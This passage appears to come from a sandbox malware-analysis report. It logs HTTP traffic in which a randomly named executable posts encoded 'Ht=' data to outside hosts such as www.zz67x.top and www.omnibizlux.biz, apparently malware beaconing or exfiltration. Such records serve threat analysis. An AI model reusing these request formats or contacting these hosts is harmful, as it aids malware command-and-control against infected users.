                                                          Data Raw: 48 74 3d 4f 54 42 63 70 6a 72 36 36 52 39 59 49 58 7a 30 4d 2b 68 72 55 58 4f 74 72 31 7a 70 41 2b 35 6c 6c 30 30 79 38 2f 52 46 54 5a 76 64 38 62 79 6b 5a 48 38 6b 42 78 6d 6d 72 4c 36 76 78 5a 42 71 63 47 7a 76 47 69 30 6b 7a 5a 5a 46 4c 6f 35 4a 50 62 63 55 6a 52 69 69 54 74 59 69 6b 77 66 42 78 45 4f 69 74 68 62 65 44 41 36 73 79 79 65 65 79 55 46 35 2b 65 4c 32 35 4d 7a 4d 45 47 39 52 35 6f 37 37 78 2b 43 75 4e 51 56 64 51 79 4c 6d 4f 7a 65 77 56 57 79 52 72 65 34 4a 78 6b 46 50 67 6c 4d 66 46 77 6d 6a 43 35 54 79 54 47 72 55 67 32 6d 62 6e 4f 73 65 50 35 36 68 55 64 36 59 50 70 65 6a 63 58 55 2b 61 43 50 37 6f 47 63 5a 70 62 66 7a 44 5a 48 47 58 74 34 73 36 56 4c 4c 61 34 69 39 72 39 51 4b 2f 2b 4f 59 42 43 72 5a 7a 48 38 47 57 73 32 79 64 77 78 53 64 6d 67 37 4a 4f 38 48 34 37 35 58 38 39 55 2b 75 57 55 54 42 44 33 76 37 44 48 75 6f 68 70 55 5a 4a 69 51 49 6d 79 6a 52 78 7a 2b 30 52 6c 4d 36 5a 52 75 69 35 79 4b 76 2b 2f 64 61 6b 68 66 58 58 76 31 2f 30 38 6a 32 53 69 54 77 75 4f 33 4e 45 4b [TRUNCATED]
                                                          Data Ascii: Ht=OTBcpjr66R9YIXz0M+hrUXOtr1zpA+5ll00y8/RFTZvd8bykZH8kBxmmrL6vxZBqcGzvGi0kzZZFLo5JPbcUjRiiTtYikwfBxEOithbeDA6syyeeyUF5+eL25MzMEG9R5o77x+CuNQVdQyLmOzewVWyRre4JxkFPglMfFwmjC5TyTGrUg2mbnOseP56hUd6YPpejcXU+aCP7oGcZpbfzDZHGXt4s6VLLa4i9r9QK/+OYBCrZzH8GWs2ydwxSdmg7JO8H475X89U+uWUTBD3v7DHuohpUZJiQImyjRxz+0RlM6ZRui5yKv+/dakhfXXv1/08j2SiTwuO3NEKXMWG5ENV6NpxIiN5AB8GgwNX/9K8dKe4FZNg6siS7dmLN7UkjWS8lqb+gPS3ge5V1gFNui7qS8ko2wLwL2XWG9e4Y96yyuJFA3a21LpBcsJVjGuLiPctsvVGv5UhOj2Fz633EnB5jezrVx6GEJccUkEhANH97O6zTIZx7Xg1nVaLUslToFwbumZXBXf/plbcY+sEj69rUsyYS8MjjtwRyqvbmJ7NYeODy7vpvRHpypPD1KCt+/213nEzHi2sgOulbtL53ecz5c0w2bw5E+KxZnkfOoUjjlcO3rUAvDmljnwllnrUqSwtnZZS31KvEwJZ5K6GannYi7ZVgCHHqnSCXwN0uGAsaw4A1TOY0bhQJQ/NJUbdct+DcLI/AyzO1zC0Xw1hRkR1WqWrbph2pEU4QBALF+M/9egB3PEA/fWcAxNvdePo0bjs3kMLgnwkWUy6Z/8pNUf2r5Kag6R5CDdrxbIK4JOlCimr01rbhDMbqQcOCfOnJWkih0qIdR2l2TrlXoZPt/zBxqutQqww45JaWaytt6dr2cr/aqVa7vaGdSv30JK2k61QXldL60GAgzYyslkI76QOpcaYulvkTFgPQMw5OwLjXEBvqbwzx7wa19aKlQWv3cWkhig7FQ30qQU6BvY5niFkyamcPqpEEQkK5KiqU30QlKbno5 [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.114999713.248.169.48803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:33:04.441015959 CET324OUTGET /ew98/?Ht=DRp8qVXu3DttXwSjdKhWcEeMlFq8C+hogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpmRDvWvsjjx3B4XGnqR7Idwi9xFOqzFZTxLg=&VRvXS=WfxxDba8X HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Host: www.sonoscan.org
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:33:05.122713089 CET394INHTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Fri, 15 Nov 2024 08:33:05 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 254
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 48 74 3d 44 52 70 38 71 56 58 75 33 44 74 74 58 77 53 6a 64 4b 68 57 63 45 65 4d 6c 46 71 38 43 2b 68 6f 67 57 78 53 76 66 5a 34 64 2f 69 72 2f 34 47 4a 4f 31 6b 42 50 47 4b 6a 72 66 4f 48 2b 49 39 48 54 42 62 77 4d 78 49 71 36 4f 5a 6d 41 2b 74 30 55 38 63 70 6d 52 44 76 57 76 73 6a 6a 78 33 42 34 58 47 6e 71 52 37 49 64 77 69 39 78 46 4f 71 7a 46 5a 54 78 4c 67 3d 26 56 52 76 58 53 3d 57 66 78 78 44 62 61 38 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Ht=DRp8qVXu3DttXwSjdKhWcEeMlFq8C+hogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpmRDvWvsjjx3B4XGnqR7Idwi9xFOqzFZTxLg=&VRvXS=WfxxDba8X"}</script></head></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.114999838.47.232.194803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:33:10.845314980 CET579OUTPOST /45n6/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.zz67x.top
                                                          Origin: http://www.zz67x.top
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 199
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.zz67x.top/45n6/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Raw: 48 74 3d 51 68 37 42 79 57 48 32 37 45 61 37 55 6c 52 68 53 2f 4b 45 61 39 6d 56 49 7a 52 70 36 66 62 35 78 34 51 36 4d 63 58 35 71 34 67 58 36 78 43 32 54 30 48 74 5a 56 71 30 61 68 2f 59 4d 61 6c 79 39 34 64 4b 65 34 45 2b 70 2f 4c 72 52 41 4c 72 4e 79 51 4c 73 31 42 41 72 41 34 59 7a 6c 33 59 65 48 4f 69 49 45 48 34 71 78 65 51 4d 38 4b 5a 61 76 66 50 75 61 6a 34 53 52 39 73 58 72 74 62 54 57 62 56 64 78 2f 65 4c 68 69 71 69 78 43 42 47 62 33 52 33 37 69 61 76 58 34 76 71 52 44 4c 64 61 4c 7a 4a 30 77 57 75 49 33 68 75 69 4a 59 57 33 77 58 33 6b 30 62 4c 4a 47 4f 71 45 37 6e 70 67 3d 3d
                                                          Data Ascii: Ht=Qh7ByWH27Ea7UlRhS/KEa9mVIzRp6fb5x4Q6McX5q4gX6xC2T0HtZVq0ah/YMaly94dKe4E+p/LrRALrNyQLs1BArA4Yzl3YeHOiIEH4qxeQM8KZavfPuaj4SR9sXrtbTWbVdx/eLhiqixCBGb3R37iavX4vqRDLdaLzJ0wWuI3huiJYW3wX3k0bLJGOqE7npg==
                                                          Nov 15, 2024 09:33:11.797110081 CET289INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Fri, 15 Nov 2024 08:33:11 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.114999938.47.232.194803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:33:13.382946968 CET599OUTPOST /45n6/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.zz67x.top
                                                          Origin: http://www.zz67x.top
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 219
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.zz67x.top/45n6/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Raw: 48 74 3d 51 68 37 42 79 57 48 32 37 45 61 37 56 45 68 68 58 63 69 45 62 64 6d 57 45 54 52 70 76 76 62 31 78 35 73 36 4d 64 53 6b 74 4d 4d 58 2f 6a 61 32 56 41 72 74 65 56 71 30 44 52 2f 5a 49 61 6c 35 39 34 68 43 65 36 51 2b 70 2f 50 72 52 41 62 72 4e 46 4d 49 74 6c 42 65 77 51 34 61 72 46 33 59 65 48 4f 69 49 45 69 76 71 78 47 51 4d 4d 36 5a 61 4f 66 4d 77 4b 6a 35 61 78 39 73 54 72 74 66 54 57 62 6e 64 77 69 37 4c 6c 53 71 69 77 79 42 48 4b 33 57 35 37 69 41 72 58 35 62 36 7a 71 47 47 35 47 6f 4f 46 67 46 6b 5a 7a 32 6d 45 45 43 47 55 35 41 30 33 38 5a 66 76 6e 2b 6a 31 65 75 79 76 2f 38 49 37 73 7a 4b 63 43 33 2b 31 68 6d 44 73 33 6a 69 68 38 3d
                                                          Data Ascii: Ht=Qh7ByWH27Ea7VEhhXciEbdmWETRpvvb1x5s6MdSktMMX/ja2VArteVq0DR/ZIal594hCe6Q+p/PrRAbrNFMItlBewQ4arF3YeHOiIEivqxGQMM6ZaOfMwKj5ax9sTrtfTWbndwi7LlSqiwyBHK3W57iArX5b6zqGG5GoOFgFkZz2mEECGU5A038Zfvn+j1euyv/8I7szKcC3+1hmDs3jih8=
                                                          Nov 15, 2024 09:33:14.326690912 CET289INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Fri, 15 Nov 2024 08:33:14 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.115000038.47.232.194803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:33:15.930581093 CET1612OUTPOST /45n6/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.zz67x.top
                                                          Origin: http://www.zz67x.top
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 1231
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.zz67x.top/45n6/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Raw: 48 74 3d 51 68 37 42 79 57 48 32 37 45 61 37 56 45 68 68 58 63 69 45 62 64 6d 57 45 54 52 70 76 76 62 31 78 35 73 36 4d 64 53 6b 74 4e 59 58 2f 77 53 32 54 58 2f 74 66 56 71 30 4c 78 2f 45 49 61 6c 6f 39 34 35 47 65 36 4d 41 70 39 48 72 44 7a 6a 72 4c 77 34 49 6e 6c 42 65 35 77 34 5a 7a 6c 33 33 65 47 69 75 49 45 79 76 71 78 47 51 4d 50 69 5a 54 2f 66 4d 33 36 6a 34 53 52 38 6a 58 72 74 37 54 53 33 33 64 77 58 4f 49 57 61 71 69 51 69 42 42 38 72 57 78 37 69 47 73 58 35 44 36 7a 33 47 47 35 61 6b 4f 46 56 69 6b 5a 37 32 69 6a 35 35 61 33 31 35 69 58 31 76 46 4f 44 36 6f 47 53 37 71 6f 6e 68 4e 59 63 43 5a 59 47 34 32 45 56 71 48 2f 36 68 6a 78 56 4b 79 30 44 6d 6d 2b 72 56 31 66 64 73 31 64 77 43 41 6e 4d 39 5a 54 67 42 31 41 55 63 4a 69 76 42 6e 5a 65 6f 45 64 42 74 4e 33 47 4c 37 61 4f 39 4e 50 4c 44 4d 4a 7a 35 61 66 71 57 66 7a 6a 44 63 45 30 65 65 63 62 38 61 58 34 57 78 4e 58 58 66 6b 64 55 52 4b 59 41 58 43 63 51 4d 6d 33 5a 31 56 31 77 59 53 36 32 7a 78 32 64 71 76 6f 37 6b 78 6d 79 6b 4f 47 [TRUNCATED]
                                                          Data Ascii: Ht=Qh7ByWH27Ea7VEhhXciEbdmWETRpvvb1x5s6MdSktNYX/wS2TX/tfVq0Lx/EIalo945Ge6MAp9HrDzjrLw4InlBe5w4Zzl33eGiuIEyvqxGQMPiZT/fM36j4SR8jXrt7TS33dwXOIWaqiQiBB8rWx7iGsX5D6z3GG5akOFVikZ72ij55a315iX1vFOD6oGS7qonhNYcCZYG42EVqH/6hjxVKy0Dmm+rV1fds1dwCAnM9ZTgB1AUcJivBnZeoEdBtN3GL7aO9NPLDMJz5afqWfzjDcE0eecb8aX4WxNXXfkdURKYAXCcQMm3Z1V1wYS62zx2dqvo7kxmykOGpZPXJ6S5WYAUGlI/RdeIobgKsNDTGXZvT2JTgXPX4GdoQ13lW4yvOXnn44rZXyxl8JnuwTJcUoLKuSQFOX7dqjIj1lfbevqKiSXGnGTyenqXgejm8i6G2rBDaax1lvqpRuR/vrp1zUw7hjqb2k9uvs/+UJYksxP0yGk2DwAVXCuHyqBmUFa6m9zsG0mfSm7qfVxPmFv5zlFxFJWWb7QOXCJuBt4fx86poP9+JDqSRrCoKw4tdT+7v3Gu4LpkMI1ZQklGkJUcK8SKairCfTlDKvGalHFpVqol41WuN4aHF+eepccuU0fKADsaUQZcfLL4X0DBYCiGfQxpjTPdTU70ZLAAltIHWc1q9kOu1ZDcOAwA/PTgn2baat5rzB9Oz3PRIIGW7MQUUvuCONixEGlpI3H6w7KarXegj80XRNCDNrFVfCanBqLyPQoTWS9PI8Up4B62OPF5YDFtPInAjFx8yULKbRfO0ZtCWqbBM+bT1vSD8ZNusIHSezLp4We3WwRG8KFn/G+djYd2H7d6NUDbq0fWpSGGKRarXo5wQxe7CfOZOiXZbwDDz/kqdFDwLRUN5I6xoGalA5mgpV1qbTaMyrIEl4GT/3rUW7f/Ti/SvxAIY8aSDhOOFPP09I+M6vicuEeXAg+tpAjZKyOMbEU2s6mvy2VKmmdJBp [TRUNCATED]
                                                          Nov 15, 2024 09:33:16.886461020 CET289INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Fri, 15 Nov 2024 08:33:16 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.115000138.47.232.194803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:33:18.482115030 CET321OUTGET /45n6/?VRvXS=WfxxDba8X&Ht=djThxhCXsVTaW29IStONWe6xHREL7sfT17x4FrONtsEdvh3lUnzIZnalbCLaN+V127dkaLgcrePaRgDcNiYylWN2xRdIuk3ZdTLMRFf+/Hm0bLjKb/7io/E= HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Host: www.zz67x.top
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:33:19.413183928 CET289INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Fri, 15 Nov 2024 08:33:19 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.1150002167.172.133.32803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:33:24.637320995 CET594OUTPOST /jlqg/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.omnibizlux.biz
                                                          Origin: http://www.omnibizlux.biz
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 199
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.omnibizlux.biz/jlqg/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Raw: 48 74 3d 78 62 59 4f 45 44 33 58 75 76 49 77 65 38 41 5a 66 47 66 6f 6e 68 5a 63 43 34 6b 34 54 39 73 4a 33 34 56 45 67 41 56 51 2f 58 71 79 64 63 56 6a 6f 4b 52 67 45 72 46 70 31 2f 53 68 62 37 68 4a 50 4a 54 42 68 68 2b 2f 56 41 63 6d 71 31 46 43 6c 62 4e 77 74 36 2b 56 70 47 48 56 57 76 7a 72 53 59 45 37 4e 44 6f 43 6e 43 77 37 73 77 70 5a 63 68 70 45 6b 7a 77 61 67 77 7a 4c 43 56 6b 70 49 72 61 4d 36 31 79 2f 74 31 5a 39 48 67 78 6b 6f 42 73 4b 2f 75 66 57 74 37 76 51 34 47 2b 68 72 4e 77 64 6c 66 42 77 53 58 57 56 30 51 4a 68 42 36 74 61 34 55 69 6a 4f 7a 2f 6f 53 73 74 6b 55 67 3d 3d
                                                          Data Ascii: Ht=xbYOED3XuvIwe8AZfGfonhZcC4k4T9sJ34VEgAVQ/XqydcVjoKRgErFp1/Shb7hJPJTBhh+/VAcmq1FClbNwt6+VpGHVWvzrSYE7NDoCnCw7swpZchpEkzwagwzLCVkpIraM61y/t1Z9HgxkoBsK/ufWt7vQ4G+hrNwdlfBwSXWV0QJhB6ta4UijOz/oSstkUg==
                                                          Nov 15, 2024 09:33:25.284940958 CET306INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.1
                                                          Date: Fri, 15 Nov 2024 08:33:25 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Content-Encoding: gzip
                                                          Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.1150003167.172.133.32803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:33:27.180752993 CET614OUTPOST /jlqg/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.omnibizlux.biz
                                                          Origin: http://www.omnibizlux.biz
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 219
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.omnibizlux.biz/jlqg/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Raw: 48 74 3d 78 62 59 4f 45 44 33 58 75 76 49 77 66 5a 51 5a 5a 6c 48 6f 68 42 5a 62 4a 59 6b 34 61 64 73 4e 33 34 4a 45 67 44 5a 2b 2f 46 4f 79 63 39 6c 6a 70 4f 6c 67 48 72 46 70 39 66 53 6b 55 62 68 34 50 49 76 4a 68 68 53 2f 56 45 4d 6d 71 31 56 43 6b 70 6c 33 69 4b 2b 74 69 6d 48 62 53 76 7a 72 53 59 45 37 4e 41 55 73 6e 43 34 37 73 67 5a 5a 64 44 42 44 71 54 77 5a 74 67 7a 4c 47 56 6c 75 49 72 62 62 36 30 75 47 74 32 68 39 48 6b 31 6b 6f 51 73 4c 6b 65 66 55 77 72 75 56 77 31 66 59 67 76 52 6d 72 35 5a 6a 57 33 4b 54 34 32 45 37 52 5a 6b 4e 37 48 71 68 61 56 65 59 62 64 49 74 50 6e 61 4c 65 2f 37 63 57 69 2f 50 39 6c 56 62 50 62 55 4b 51 56 41 3d
                                                          Data Ascii: Ht=xbYOED3XuvIwfZQZZlHohBZbJYk4adsN34JEgDZ+/FOyc9ljpOlgHrFp9fSkUbh4PIvJhhS/VEMmq1VCkpl3iK+timHbSvzrSYE7NAUsnC47sgZZdDBDqTwZtgzLGVluIrbb60uGt2h9Hk1koQsLkefUwruVw1fYgvRmr5ZjW3KT42E7RZkN7HqhaVeYbdItPnaLe/7cWi/P9lVbPbUKQVA=
                                                          Nov 15, 2024 09:33:27.864753008 CET306INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.1
                                                          Date: Fri, 15 Nov 2024 08:33:27 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Content-Encoding: gzip
                                                          Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.1150004167.172.133.32803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:33:29.743107080 CET1627OUTPOST /jlqg/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.omnibizlux.biz
                                                          Origin: http://www.omnibizlux.biz
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 1231
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.omnibizlux.biz/jlqg/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Raw: 48 74 3d 78 62 59 4f 45 44 33 58 75 76 49 77 66 5a 51 5a 5a 6c 48 6f 68 42 5a 62 4a 59 6b 34 61 64 73 4e 33 34 4a 45 67 44 5a 2b 2f 46 47 79 64 4c 35 6a 72 70 35 67 47 72 46 70 7a 2f 53 6c 55 62 68 6c 50 49 33 7a 68 68 76 49 56 47 45 6d 73 6d 4e 43 30 4e 78 33 35 61 2b 74 74 47 48 57 57 76 7a 69 53 63 59 6e 4e 44 73 73 6e 43 34 37 73 6a 52 5a 4c 68 70 44 6f 54 77 61 67 77 7a 58 43 56 6b 4a 49 72 53 75 36 30 61 57 74 48 42 39 48 45 6c 6b 75 6d 34 4c 35 75 66 61 7a 72 75 7a 77 31 54 35 67 76 4d 64 72 35 45 45 57 31 4b 54 34 7a 64 77 4e 4b 49 37 74 30 65 4f 4e 6d 58 39 51 4e 49 2f 4d 32 4c 32 5a 61 37 64 56 31 4c 62 68 6d 31 66 61 4b 45 73 4f 41 55 7a 31 70 30 39 65 41 6b 4b 57 61 49 34 43 72 4f 4b 4b 7a 50 79 43 69 6e 71 51 4a 4f 76 4f 34 41 62 67 62 6b 76 69 72 5a 59 63 33 4f 59 6e 33 4a 7a 4d 61 79 63 57 73 58 46 4f 71 6d 73 79 6d 6d 54 45 68 47 47 68 43 62 78 65 6e 53 77 56 48 6f 37 50 33 55 69 55 4c 70 4a 73 6a 30 62 49 46 37 35 73 6f 46 65 76 7a 68 71 6f 41 6b 57 57 41 35 38 6b 4d 33 36 79 55 48 [TRUNCATED]
